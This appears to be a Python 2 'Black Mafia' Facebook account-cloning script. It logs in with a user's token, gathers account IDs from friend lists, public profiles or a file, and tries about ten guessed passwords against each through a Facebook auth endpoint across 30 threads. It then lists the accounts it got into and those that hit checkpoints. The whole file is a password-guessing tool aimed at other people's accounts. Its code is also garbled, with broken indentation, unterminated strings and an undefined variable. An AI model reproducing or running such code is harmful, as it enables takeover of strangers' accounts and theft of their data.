#!/usr/bin/python2
#coding=utf-8

import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib
from multiprocessing.pool import ThreadPool
try:
    import requests
except ImportError:
    os.system('pip2 install requests')
try:
    import mechanize
except ImportError:
    os.system('pip2 install mechanize')
    os.system('python2 lovehacker')

from requests.exceptions import ConnectionError
from mechanize import Browser

#### browser ####
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent','Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]

#### colours ####
B='\033[1;94m'
R='\033[1;91m'
G='\033[1;92m'
W='\033[1;97m'
S='\033[1;96m'
P='\033[1;95m'
Y='\033[1;93m'

#### exit ####
def exb():
	print (R + 'Exit')
	os.sys.exit()

#### clear ####
def cb():
    os.system('clear')

#### time sleep ####
def t():
    time.sleep(1)
def t1():
    time.sleep(0.01)

#### print std ####
def psb(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		t1()

#### token remove ####
def trb():
    os.system('rm -rf token.txt')

##### LOGO #####
logo='''
\033[1;91m■☆☆===============================☆☆☆
\033[1;97m■          B                          L           ■B
\033[1;93m■          L             Black        O           ■■L
\033[1;97m■          A            Mafia         V           ■■■A
\033[1;91m■          C                          E           ■■■■C
\033[1;94m■          K                                      ■■■■■K
\033[1;94m■                                                 ■■■■■■
\033[1;96m■Ї̳͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓̿̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽ї͓͓͓͓͓͓̽̽̽̽̽̽ї͓͓͓͓͓̽̽̽̽̽ї͓͓͓͓̽̽̽̽ї͓͓͓̽̽̽ї͓͓̽̽ї͓̽її͓̽ї͓͓̽̽ї͓͓͓̽̽̽ї͓͓̽̽ї͓̽її͓̽ї͓͓̽̽ї͓͓͓̽̽̽ї͓͓͓͓̽̽̽̽ї͓͓͓͓͓̽̽̽̽̽ї͓͓͓͓͓͓̽̽̽̽̽̽ї̳͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓̿̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽Ї̳͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓̿̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽ї͓̽ї͓͓̽̽ї͓͓͓̽̽̽ї͓͓̽̽ї͓̽її͓̽ї͓͓̽̽ї͓͓͓̽̽̽ї͓͓͓͓̽̽̽̽ї͓͓͓͓͓̽̽̽̽̽ї͓͓͓͓͓͓̽̽̽̽̽̽ї̳͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓̿̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽Ї̳͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓̿̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽ї͓̽ї͓͓̽̽ї͓͓͓̽̽̽ї͓͓̽̽ї͓̽її͓̽ї͓͓̽̽ї͓͓͓̽̽̽ї͓͓͓͓̽̽̽̽ї͓͓͓͓͓̽̽̽̽̽ї͓͓͓͓͓͓̽̽̽̽̽̽ї̳͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓͓̿̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽̽■■■■■■■
\033[1;97m■                                     H           ■■■■■■
\033[1;94m■         M              love         A           ■■■■■M
\033[1;91m■         A             Hacke         C           ■■■■A
\033[1;97m■         F                           K           ■■■F
\033[1;93m■         I      WhatsApp Num         E           ■■I
\033[1;97m■         A      03094161457          R           ■A
\033[1;91m■☆☆===============================☆☆☆
\033[1;96m░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░

\033[1;91m☞ Auther     : lovehacker✅
\033[1;92m☞ WhatsApp   : 03094161457
\033[1;95m☞ YouTube    : https://m.youtube.com/channel/UCRrRgcJjsnNm5Bi5ZenRGnw

\033[1;96m░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
                                '''
back=0
successfull=[]
checkpoint=[]
oks=[]
cps=[]
id=[]

#### login ####
def login():
	cb()
	try:
		tb=open('token.txt', 'r')
		menu() 
	except (KeyError,IOError):
		cb()
		print (logo)
		print (R + '◈━━━━▷' + S + ' Login With Facebook' + R + '◁━━━━◈')
		print
		id=raw_input(S + '[☆] ' + S + 'Email: ' + G +'')
		pwd=getpass.getpass(S + '[♡] ' + R + 'Password : ')
		data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(id)+"&locale=en_US&password="+(pwd)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
		z=json.load(data)
		if 'access_token' in z:
		    st = open("token.txt", "w")
		    st.write(z["access_token"])
		    st.close()
		    print (S + '[☆]' + Y + ' Login successfull 100% ✓')
		    os.system('xdg-open https://m.youtube.com/channel/UCRrRgcJjsnNm5Bi5ZenRGnw')
		    menu()
		else:
		    if "www.facebook.com" in z["error_msg"]:
		        print (R + 'Account has a checkpoint !')
		        t()
		        login()
		    else:
		        print (R + 'number/user id/ password is wrong !')
		        trb()
		        t()
		        login()
def menu():
	cb()
	try:
		tb=open('token.txt','r').read()
	except IOError:
		print (R + 'Token Invalid !')
		trb()
		t()
		login()
	try:
		otw=requests.get('https://graph.facebook.com/me?access_token='+tb)
		a=json.loads(otw.text)
	except KeyError:
		print (G + 'Account has a checkpoint !')
		trb()
		t()
		login()
	except requests.exceptions.ConnectionError:
		print (W + 'No internet connection !')
		t()
		exb()
	cb()
	print (logo)
	print (S + '[☆] ' + G + 'ID Name: ' + R + a['name'])
	print (S + '[☆] ' + G + 'User ID: ' + R + a['id'])
	print
	print (S + 50*'-')
	print
	print (S + '[' + P + '☞1' + S + ']' + S + ' Fast Cloning USA ID')
	print (S + '[' + P + '☞2' + S + ']' + S + ' Black Mafia WhatsApp Group')
	print (S + '[' + Y + '☞3' + S + ']' + G + ' Log Out')
	print (S + '[' + Y + '☞0' + S + ']' + R + ' Exit')
	print
	print (S + 50*'-')
	print
	mb()


def mb():
	bm=raw_input(W + ' ✬Slect Option✬   ')
	if bm =='':
		print (R + 'Select a valid option !')
		mb()
	elif bm =='1':
		pak()
	elif bm =='2':
	    os.system('xdg-open https://chat.whatsapp.com/FmuKakzK8oV3Rp6gpf9Xqr')
	    menu()
	elif bm =='3':
		psb('Token Has Been Removed')
		trb()
		t()
		exb()
	elif bm =='0':
	    exb()
	else:
		print (R+'Fill in correctly !')
		mb()


def pak():
	global tb
	try:
		tb=open('token.txt','r').read()
	except IOError:
		print (R + ' Invalid Token !')
		trb()
		t()
		login()
	cb()
	print (logo)
	print (S + '[' + P + '☞1' + S + ']' + P + ' Clone With Friend List')
	print (S + '[' + P + '☞2' + S + ']' + P + ' Clone From Public Account')
	print (S + '[' + Y + '☞3' + S + ']' + Y + ' Clone From File')
	print (S + '[' + R + '☞0' + S + ']' + R + ' Back')
	print
	print (S + 50*'-')
	print
	pb()

def pb():
	bp=raw_input(W + ' ✬slect Option✬   ')
	if bp =='':
		print (R + 'Select a valid option !')
		pb()
	elif bp =='1':
		cb()
		print (logo)
		r=requests.get('https://graph.facebook.com/me/friends?access_token='+tb)
		z=json.loads(r.text)
		for s in z['data']:
			id.append(s['id'])
	elif bp=='2':
		cb()
		print (logo)
		idt=raw_input(S + '[☆] ' + G + 'Put Public User ID/User Name: ' + W + '')
		cb()
		print (logo)
		try:
			jok=requests.get('https://graph.facebook.com/'+idt+'?access_token='+tb)
			op=json.loads(jok.text)
			psb(S + '[☆]' + G + ' Account  Name: ' + W + op['name'])
		except KeyError:
			print (R + ' ID not found !')
			raw_input(R + ' Back')
			pak()
		r=requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+tb)
		z=json.loads(r.text)
		for i in z['data']:
			id.append(i['id'])
	elif bp =='3':
		cb()
		print (logo)
		try:
			idlist=raw_input(S + '[☆] ' + R + 'Enter File Path: ' + G + '')
			for line in open(idlist,'r').readlines():
				id.append(line.strip())
		except IOError:
			print (R + ' File Not Fount !')
			raw_input(R + ' Back')
			pak()
	elif bp =='0':
		menu()
	else:
		print (R + ' Select a valid option !')
		pb()
	print (S + '[☆]' + P + ' Total Friends: ' + W + str(len(id)))
	psb(S + '[☆]' + S + ' To stop process  click on CTRL ~ Z')
	print
	print (S + 50*'-')
	print
	def main(arg):
		global cps, oks
		user=arg
		try:
      h=requests.get('https://graph.facebook.com/'+user+'/?access_token='+tb)
      j=json.loads(h.text)
          ps1=('Michael'+j['last_name'])
      dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='+(ps1)+'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
      k=json.load(dt)
      if 'www.facebook.com' in k['error_msg']:
          print(S+'[CP] | '+user+' | '+ps1+'•'+name+')
          cps.append(user+ps1)
      else:
          if 'access_token' in k:
              print (G+'[OK] | '+user+' | '+ps1+'•'+name+')
              oks.append(user+ps1)
          else:
              ps2=('John'+j['last_name'])
      
              dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='+(ps2)+'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
              k=json.load(dt)
              if 'www.facebook.com' in k['error_msg']:
                  print(S+'[CP] | '+user+' | '+ps2+'•'+name+')
                  cps.append(user+ps2)
              else:
                  if 'access_token' in k:
                      print(G+'[OK] | '+user+' | '+ps2+'•'+name+')
                      oks.append(user+ps2)
                  else:
                      ps3=('Alex'+j['last_name'])
                      dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='+(ps3)+'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                      k=json.load(dt)
                      if 'www.facebook.com' in k['error_msg']:
                          print(S+'[CP] | '+user+' | '+ps3+'•'+name+')
                          cps.append(user+ps3)
                      else:
                          if 'access_token' in k:
                              print(G+'[OK] | '+user+' | '+ps3+'•'+name+')
                              oks.append(user+ps3)
                          else:
                              ps4=('Mark'+j['last_name'])
                              dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='+(ps4)+'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                              k=json.load(dt)
                              if 'www.facebook.com' in k['error_msg']:
                                  print(S+'[CP] | '+user+' | '+ps4+'•'+name+')
                                  cps.append(user+ps4)
                              else:
                                  if 'access_token' in k:
                                      print(G+'[OK] | '+user+' | '+ps4+'•'+name+')
                                      oks.append(user+ps4)
                                  else:
                                      ps5=('David'+j['last_name'])
                                      dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='+(ps5)+'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                                      k=json.load(dt)
                                      if 'www.facebook.com' in k['error_msg']:
                                          print(S+'[CP] | '+user+' | '+ps5+'•'+name+')
                                          cps.append(user+ps5)
                                      else:
                                          if 'access_token' in k:
                                              print(G+'[OK] | '+user+' | '+ps5+'•'+name+')
                                              oks.append(user+ps5)
                                          else:
                                              ps6=('Jack'+j['last_name'])
                                              dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='+(ps6)+'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                                              k=json.load(dt)
                                              if 'www.facebook.com' in k['error_msg']:
                                                  print(S+'[CP] | '+user+' | '+ps6+'•'+name+')
                                                  cps.append(user+ps6)
                                              else:
                                                  if 'access_token' in k:
                                                      print(G+'[OK] | '+user+' | '+ps6+'•'+name+')
                                                      oks.append(user+ps6)
                                                  else:
                                                     ps7=('Richard'+j['last_name'])
                                                           dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='+(ps7)+'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                                                     k=json.load(dt)
                                                     if 'www.facebook.com' in k['error_msg']:
                                                         print(S+'[CP] | '+user+' | '+ps7+'•'+name+')
                                                         cps.append(user+ps7)
                                                           else:
                                                               if 'access_token' in k:
                                                             print(G+'[OK] | '+user+' | '+ps7+'•'+name+')
                                                             oks.append(user+ps7)
                                                         else:
                                                            ps8=('Lisa'+j['last_name'])
                                                            dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='+(ps8)+'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                                                            k=json.load(dt)
                                                            if 'www.facebook.com' in k['error_msg']:
                                                                print(S+'[CP] | '+user+' | '+ps8+'•'+name+')
                                                                cps.append(user+ps8)
                                                            else:
                                                                if 'access_token' in k:
                                                                    print(G+'[OK] | '+user+' | '+ps8+'•'+name+')
                                                                    oks.append(user+ps8)
                                                                else:
                                                                   ps9=('Justin'+j['last_name'])
                                                                   dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='+(ps9)+'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                                                                   k=json.load(dt)
                                                                   if 'www.facebook.com' in k['error_msg']:
                                                                       print(S +'[CP] | '+user+' | '+ps9+'•'+name+')
                                                                       cps.append(user+ps9)
                                                                   else:
                                                                       if 'access_token' in k:
                                                                           print(G+'[OK] | '+user+' | '+ps9+'•'+name+')
                                                                          oks.append(user+ps9)
                                                                      else:
                                                                         ps10=('Daniel'+j['last_name'])
                                                                         dt=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email='+(user)+'&locale=en_US&password='+(ps10)+'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
                                                                         k=json.load(dt)
                                                                         if 'www.facebook.com' in k['error_msg']:
                                                                             print(S+'[CP] | '+user+' | '+ps10+'•'+name+')
                                                                             cps.append(user+ps10)
                                                                         else:
                                                                             if 'access_token' in k:
                                                                             print(G+'[OK] | '+user+' | '+ps10+'•'+name+')
                                                                             oks.append(user+ps10)
		except:
			pass
	p=ThreadPool(30)
	p.map(main, id)
	print
	print(S+50*'-')
	print
	print(S+'Process has been completed CP ID Open After 7 Days ')
	print(Y+'Total '+G+'OK'+S+'/'+P+'CP'+S+' = '+G+str(len(oks))+S+'/'+R+str(len(cps)))
	print(S+'BlackMafia')     
	print
	raw_input(R + 'Back')
	os.system('python2 lovehacker')
if __name__=='__main__':
    login()

